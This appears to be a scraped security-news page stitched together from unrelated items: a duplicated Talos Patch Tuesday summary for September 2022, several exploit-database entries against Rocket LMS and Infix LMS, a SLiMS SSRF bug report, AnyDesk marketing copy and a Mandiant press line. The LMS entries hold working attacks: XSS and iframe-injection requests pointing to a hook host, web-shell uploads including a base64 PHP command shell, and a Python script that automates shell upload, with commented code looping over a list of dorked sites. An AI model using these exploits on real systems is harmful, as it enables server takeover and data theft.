Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability.

CVE-2022-38012

By Jon Munshaw and Asheer Malhotra. 
Microsoft released its monthly security update Tuesday, disclosing 64 vulnerabilities across the company’s hardware and software line, a sharp decline from the record number of issues Microsoft disclosed last month. 
September's security update features five critical vulnerabilities, 10 fewer than were included in last month’s Patch Tuesday. There are two moderate-severity vulnerabilities in this release and a low-security issue that’s already been patched as a part of a recent Google Chromium update. The remainder is considered “important.” 
The most serious vulnerability exists in several versions of Windows Server and Windows 10 that could allow an attacker to gain the ability to execute remote code (RCE) by sending a singular, specially crafted IPv6 packet to a Windows node where IPSec is enabled. CVE-2022-34718 only affects instances that have IPSec enabled. This vulnerability has a severity score of 9.8 out of 10 and is considered “more likely” to be exploited by Microsoft. 
Microsoft disclosed one vulnerability that's being actively exploited in the wild — CVE-2022-37969. Microsoft's advisory states this vulnerability is already circulating in the wild and could allow an attacker to gain SYSTEM-level privileges by exploiting the Windows Common Log File System Driver. The adversary must first have the access to the targeted system and then run specific code, though no user interaction is required.


CVE-2022-34721 and CVE-2022-34722 also have severity scores of 9.8, though they are “less likely” to be exploited, according to Microsoft. These are remote code execution vulnerabilities in the Windows Internet Key Exchange protocol that could be triggered if an attacker sends a specially crafted IP packet.

Two other critical vulnerabilities, CVE-2022-35805 and CVE-2022-34700 exist in on-premises instances of Microsoft Dynamics 365. An authenticated attacker could exploit these vulnerabilities to run a specially crafted trusted solution package and execute arbitrary SQL commands. The attacker could escalate their privileges further and execute commands as the database owner. 
Talos would also like to highlight five important vulnerabilities that Microsoft considers to be “more likely” to be exploited:  


CVE-2022-37957 — Windows Kernel Elevation of Privilege Vulnerability 
CVE-2022-35803 — Windows Common Log File System Driver Elevation of Privilege Vulnerability 
CVE-2022-37954 — DirectX Graphics Kernel Elevation of Privilege Vulnerability 
CVE-2022-34725 — Windows ALPC Elevation of Privilege Vulnerability 
CVE-2022-34729 — Windows GDI Elevation of Privilege Vulnerability 


A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page. 
In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 
The rules included in this release that protect against the exploitation of many of these vulnerabilities are 60546, 60547, 60549, 60550 and 60552 - 60554. We've also released Snort 3 rules 300266 - 300270.

_By Jon Munshaw and Asheer Malhotra._ 

Microsoft released its monthly security update Tuesday, disclosing 64 vulnerabilities across the company’s hardware and software line, a sharp decline from the record number of issues Microsoft disclosed last month. 

September's security update features five critical vulnerabilities, 10 fewer than were included in last month’s Patch Tuesday. There are two moderate-severity vulnerabilities in this release and a low-security issue that’s already been patched as a part of a recent Google Chromium update. The remainder is considered “important.” 

The most serious vulnerability exists in several versions of Windows Server and Windows 10 that could allow an attacker to gain the ability to execute remote code (RCE) by sending a singular, specially crafted IPv6 packet to a Windows node where IPSec is enabled. CVE-2022-34718 only affects instances that have IPSec enabled. This vulnerability has a severity score of 9.8 out of 10 and is considered “more likely” to be exploited by Microsoft.

Microsoft disclosed one vulnerability that's being actively exploited in the wild — CVE-2022-37969. Microsoft's advisory states this vulnerability is already circulating in the wild and could allow an attacker to gain SYSTEM-level privileges by exploiting the Windows Common Log File System Driver. The adversary must first have the access to the targeted system and then run specific code, though no user interaction is required.

CVE-2022-34721 and CVE-2022-34722 also have severity scores of 9.8, though they are “less likely” to be exploited, according to Microsoft. These are remote code execution vulnerabilities in the Windows Internet Key Exchange protocol that could be triggered if an attacker sends a specially crafted IP packet.

Two other critical vulnerabilities, CVE-2022-35805 and CVE-2022-34700 exist in on-premises instances of Microsoft Dynamics 365. An authenticated attacker could exploit these vulnerabilities to run a specially crafted trusted solution package and execute arbitrary SQL commands. The attacker could escalate their privileges further and execute commands as the database owner. 

Talos would also like to highlight five important vulnerabilities that Microsoft considers to be “more likely” to be exploited:  

*   CVE-2022-37957 — Windows Kernel Elevation of Privilege Vulnerability 
*   CVE-2022-35803 — Windows Common Log File System Driver Elevation of Privilege Vulnerability 
*   CVE-2022-37954 — DirectX Graphics Kernel Elevation of Privilege Vulnerability 
*   CVE-2022-34725 — Windows ALPC Elevation of Privilege Vulnerability 
*   CVE-2022-34729 — Windows GDI Elevation of Privilege Vulnerability 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 60546, 60547, 60549, 60550 and 60552 - 60554. We've also released Snort 3 rules 300266 - 300270.

Microsoft Patch Tuesday for September 2022 — Snort rules and prominent vulnerabilities 

Rocket LMS version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04-------Request-----------GET /search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21--Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; XSRF-TOKEN=eyJpdiI6ImN0MTZwSkxBTEF0VGVtTmo4cmdxSUE9PSIsInZhbHVlIjoidlEvSDRITWdRaXpXU0Q1amE1cSsxTUNZc0lSVHdRWVVxaUp1cURrM3JQSGNTTTQxRUVjSWdGbUtPZVBWV3FiRk5yU3VHNzBZTU4rNDA1VDlsS1BHdC9FRExpbjdhakhDUk56d1l1VGxlSjdFSWVuR2ZQZXBDamt1MVVkdHBRTUsiLCJtYWMiOiJhOTY5YzU2MzE3NmRjMWM0NzBkNmVlNWI1NmU5MjExZGRhZGU2NzYwY2Y5M2FmNzI5YjViMTRmNjI5Y2E0NjdiIn0%3D; rocketlms_session=eyJpdiI6Im9YRVkvTVYyQkZqNkVKR05xK3VVVGc9PSIsInZhbHVlIjoiS1plaFpXSVVJVGdiSE9vK3MxbTk2S3FSMmx6T1dnSGduZ3RZZERlc28xbmRrSWpuSStpMml0L2hkdFdXS3NmWnhHdlV1MXNicUI5Q2ErR1cwODdkYXFEbnd6WlVTZVlCbEZOZVg0VjJrc2J0ZFNVMzd6TW8rVHE5QXlkdEpmS1UiLCJtYWMiOiJhMDBiNjhmNTA1ZDM3ODMzNGQ2MDA4YTA5Nzk0ZDlhMTM5NjM1OWEwNGZmOTViNmU2MGE2YmQ2NWQwMGUzYWMwIn0%3DConnection: close

Rocket LMS 1.6 Cross Site Scripting

Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

# Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket: def __init__(self,ssl,host,port,email,password,file): self._url_to_upload = "/panel/setting" self._url_to_login = "/login" self.host = host self.port = port self.ssl = ssl self.email = email self.password = password self.file = file def get_csrf_token(self,client,URL): fromt = client.get(URL) if 'XSRF-TOKEN' in client.cookies: csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0] return csrftoken else: print("Error while fetching token") return def login(self): client = requests.session() if self.ssl == True: ssl= "https://" else: ssl= "http://" URL = str(ssl+self.host+":"+self.port+self._url_to_login) URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload) csrftoken = self.get_csrf_token(client,URL) fromt = client.get(URL) # sets cookie login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel') r = client.post(URL, data=login_data, cookies=client.cookies) self.upload_shell(client,URL2) self.upload_htaccess(client,URL2) def upload_shell(self,client,URL): csrftoken = self.get_csrf_token(client,URL) with open(self.file,"r") as payload: to_base64 = payload.read() to_base64 = str(to_base64).encode("utf-8") base64_encoded_data= base64.b64encode(to_base64) base64_encoded_data = str(base64_encoded_data)[:-1] base64_encoded_data = str(base64_encoded_data)[2:] string = "data:image/php;base64,"+str(base64_encoded_data) data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="") r = client.post(URL, data=data, cookies=client.cookies) print(r.status_code) if r.status_code == 200: print("sent and uploaded shell :"+URL+"\n") else: print("couldn't upload shell") def upload_htaccess(self,client,URL): csrftoken = self.get_csrf_token(client,URL) string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4=" data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="") r = client.post(URL, data=data, cookies=client.cookies) print(r.status_code) if r.status_code == 200: print("sent and uploaded htaccess:"+URL+"\n") print("Go and rename file in filemanager on website") else: print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:# with open("sites.txt","r") as urls:# url = urls.readlines()# ssl = True# port = 443# for line in url: # try:# if "sslyok" in line:# port = 80# ssl = False# line = str(line.rstrip('%0a')) # print("trying:"+line)# elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")# elon.login()# time.sleep(1) # except Exception:# #traceback.print_exc()# print("atamadim") # finally:# print("okey")# except Exception:# print("atamadim")

Rocket LMS 1.6 Shell Upload

SLiMS Senayan Library Management System v9.4.2 was discovered to contain multiple Server-Side Request Forgeries via the components /bibliography/marcsru.php and /bibliography/z3950sru.php.

**The bug**  
A Server Side Request Forgery exists in admin/modules/bibliography/marcsru.php and admin/modules/bibliography/z3950sru.php due to the class in lib/marc/XMLParser.inc.php

**Reproduce**  
Steps to reproduce the behavior:

1.  Go to http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography then go to copy cataloguing
2.  choose between marc sru or 23950sru
3.  type in something what you want in the search bar
4.  set burpsuite intercept on
5.  change the z3950_SRU_source or marc_SRU_source parameter value to some url that grab the traffic
6.  forward the request
7.  or just visit http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN

**Screenshots**  
Normal requests

Tampered and SSRF trigger(netcat)

Tampered and SSRF trigger(toptal.com)

**Versions**

*   OS: MacOS Mojave 10.14.6
*   Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86\_64)
*   Slims Version: slims9\_bulian-9.4.2

CVE-2022-38292: [Security Bugs]  Server Side Request Forgery · Issue #158 · slims/slims9_bulian

An issue was discovered in AnyDesk before 6.2.6 and 6.3.x before 6.3.3. An unnecessarily open listening port on a machine in the LAN of an attacker, opened by the Anydesk Windows client when using the tunneling feature, allows the attacker unauthorized access to the local machine's AnyDesk tunneling protocol stack (and also to any remote destination machine software that is listening to the AnyDesk tunneled port).

*   Windows
    
*   macOS
    
*   Android
    
*   iOS
    
*   Linux
    
*   FreeBSD
    
*   Raspberry Pi
    
*   Chrome OS
    

Discover AnyDesk for Windows

*   Lightly designed.
*   Smooth Remote Desktop connections.
*   Easy Online Remote Collaboration.
*   Compatible with earlier Windows versions.
*   Always free updates.

Download Now

**Highlights**

**Dynamic performance**

Establish seamless Remote Desktop connections in Windows and offer excellent Remote Support to your customers with the help of thought-through features.

Subscribe Now

**Flexibility**

Customize AnyDesk with your own brand and logo to highlight your corporate identity. Easily administrate all settings and configurations in Windows.

Subscribe Now

**Compatibility**

AnyDesk is not only compatible with Windows 10 and older. You can also establish connections with many other operating systems and their various versions, including iOS, macOS, Linux and Android.

Subscribe Now

Tutorial: An easy installation guide

**AnyDesk on any platform**

  

 To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

**Do you need more information? Our online Help Center provides all the answers.**

Help Center

**Interested in the most relevant changes in our latest AnyDesk version?**

Learn More

**Trusted by over 100,000 customers**

**More features**

**Administration**

AnyDesk facilitates managing your Remote Desktop contacts and connections. You can administrate all settings and configurations in Windows with Group Policies. Focus on your projects rather than their administration.

Learn More

**Security**

Thanks to TLS 1.2 encryption technology and incessant verification of connections, AnyDesk ensures end-to-end privacy and protects your data. Only authorized desks can demand Remote Access to your device via AnyDesk.

Learn More

**On-Premises**

You can establish an autonomous, private network that fully shields your data while operating Windows Remote Desktops with AnyDesk On-Premises. All information remains within your own network.

Learn More

CVE-2021-44425: Remote Desktop Software for Windows – AnyDesk

Infix LMS version 4.3.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Infix LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608# Version: 4.3.0# Tested on Ubuntu 18.04sign up as teachergo profile page and try to upload profile picwith bypass name restriction on post request with burp or etc, upload b374k with burp or else -------Request-----------POST /profile-update HTTP/1.1Host: localhostContent-Length: 102201Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzjX6L4V6hVC4KIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/profile-settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijhpc05lZDlpcElOM1ZJZ0sxZDBXSUE9PSIsInZhbHVlIjoiVXRsZGNUNVlGWXY5RVpxTDVPK08wQW5TK05RMmUvRUVYKzQ0L0R0cHpyZmhmUFFHVm04ZWo2UVVUYkNuYm15c3RrcUlzQnJySnBWUHdHOGF6NkVneUNibDZxbEc1MytrWVRzVDVhaDNOYjN1ZGI1aHFEd3B2VXgrczZrUjEzR2QiLCJtYWMiOiJkNTZmNTU3YzU0NzJlNzJhMWIwMWNmMDhjMjI2ZTEzZjgwMDY0Mzk1ZjRiMWNhZjczZjhmNTQyN2NiNWZhMTdjIiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6InBSSllCaHF1UFlLS0dpT3RYaHRkRkE9PSIsInZhbHVlIjoiYlI3ak1obGtEa1hiV1hhOEF4V2Y1RjVTQmJHVjdvRmUrRmM0aE4wcElycHRCWnNVeG5LSVJBb3A1SDBXaU9mUzZTZ2EvSDZTZ00vRmZUbXZXZ2UzK3BsMlRJVDlJSThpRGc0SEEvZmh5cmtHSkhDWGNTOCtEcFdkaGEwdjhpOHAiLCJtYWMiOiI0NjJhMTRjNjIyMWQyM2MxZDliOGIzYjNmZmQ5YjA1YWVmYjUzZjhjMmI2MjAwNTFiZGNlN2RiMmUyMzhlZDFhIiwidGFnIjoiIn0%3DConnection: close------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="_token"0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="name"Teacher------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="email"teacher@infixedu.com------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="phone"01711223345------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="country"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="city"1374------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="zip"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="currency"112------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="language"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="facebook"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="twitter"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="linkedin"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="instagram"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="short_details"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="about"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="image"; filename="shell.php.jpg.php"Content-Type: image------b374kshell content-----------WebKitFormBoundaryzjX6L4V6hVC4KIEC--

Infix LMS 4.3.0 Shell Upload

Infix LMS version 4.3.0 suffers from an iframe injection vulnerability.

# Exploit Title: Infix LMS - Learning Management System IFRAME Injection 
# Exploit Author: th3d1gger 
# Vendor Homepage: https://codecanyon.net 
# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608 
# Version: 4.3.0 
# Tested on Ubuntu 18.04 
sign up as teacher 
go course page and try to add course or edit 
with bypass special char restrict on post request with burp or etc, inject iframe with beef hook or else on any note-editor field

--request-- 
POST /admin/course/updateCourse HTTP/1.1 
Host: localhost 
Content-Length: 3855 
Cache-Control: max-age=0 
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" 
sec-ch-ua-mobile: ?0 
sec-ch-ua-platform: "Linux" 
Upgrade-Insecure-Requests: 1 
Origin: http://localhost 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydcMGShie2VwdqOn2 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Sec-Fetch-Site: same-origin 
Sec-Fetch-Mode: navigate 
Sec-Fetch-User: ?1 
Sec-Fetch-Dest: document 
Referer: http://localhost/admin/course/course-details/7?type=courseDetails 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.9 
Cookie: XSRF-TOKEN=eyJpdiI6IlhIUjU2U3FiTUMzQzZxT2E0OVVhZ1E9PSIsInZhbHVlIjoiRDBWUnFuakRhbTlHMStIb0xaRGp3YndQY3lla0RWcjZ2N3VyUUZMUzU1M004azBNNFk2QlBQNnJGSzRxWnh3bVppZ1hBcmRaOEV3TWd0L2V3R3FXcTZTQVpMQWxFSXQvOE00a3NZK0tjaDNqNzJ4ckdQc2psN2tMUzJaK3kzaDgiLCJtYWMiOiIxMjNjZTExZGE1MzUzNmQ0ZGMxMzk3Y2Y5NmEwMjZjNjdhZDEyNDU5ODYwYTVhZTZjM2UwN2VhNzZiMGY0OTI5IiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6Im1hSEwwZ3ZlbGJUVGpqTFJLSEdkOGc9PSIsInZhbHVlIjoiSUNJbDZMbmNLSWVlWm1OU3BqYVpYYTkzK3BVN0xxaG1qZnpCVis1TjAwd1FRV3RKUlRNbGdleUhaUWRpdXMwTmxtMFJjc3BTUTV2Ty9zLzkyTWZBckpRTUlsVEc1dmlVbzRwOHRhdW1nSWpNdkRnbmNUMGFqZFUyVml2UDBDclMiLCJtYWMiOiIzZjBmNjVlNDg0MjFmN2NiYjI3ZmIxNmM0YjlkMjE1MGZjZTVlN2Y5N2JmYTcwOWM1ZDA2ZmU4MzIzYzI2YTExIiwidGFnIjoiIn0%3D 
Connection: close

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="_token"

0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="type"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="drip"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="title"

Introduction to Programming and App Development 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="id"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="requirements"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="about"

 <iframe src="http://192.168.1.18:3000/uploads/test.html"><div> </div> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text 
 ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="outcomes"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="category"

4 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="sub_category"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="mode_of_delivery"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="quiz"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="level"

2 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="language"

19 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="duration"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="complete_order"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="price"

20 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="is_discount"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="discount_price"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="host"

Youtube 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="trailer_link"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vimeo"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vdocipher"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="file"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="scope"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="image"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundarydcMGShie2VwdqOn2--

Infix LMS 4.3.0 IFRAME Injection

The threat-intelligence and cyberdefense company company will join Google Cloud and retain its brand name.

**MOUNTAIN VIEW, Calif., and RESTON, Va., Sept. 12, 2022 /PRNewswire/** — Google LLC today announced the completion of its acquisition of Mandiant Inc. (NASDAQ: MNDT), a recognized leader in dynamic cyberdefense, threat intelligence and incident-response services. Mandiant will join Google Cloud and retain the Mandiant brand.

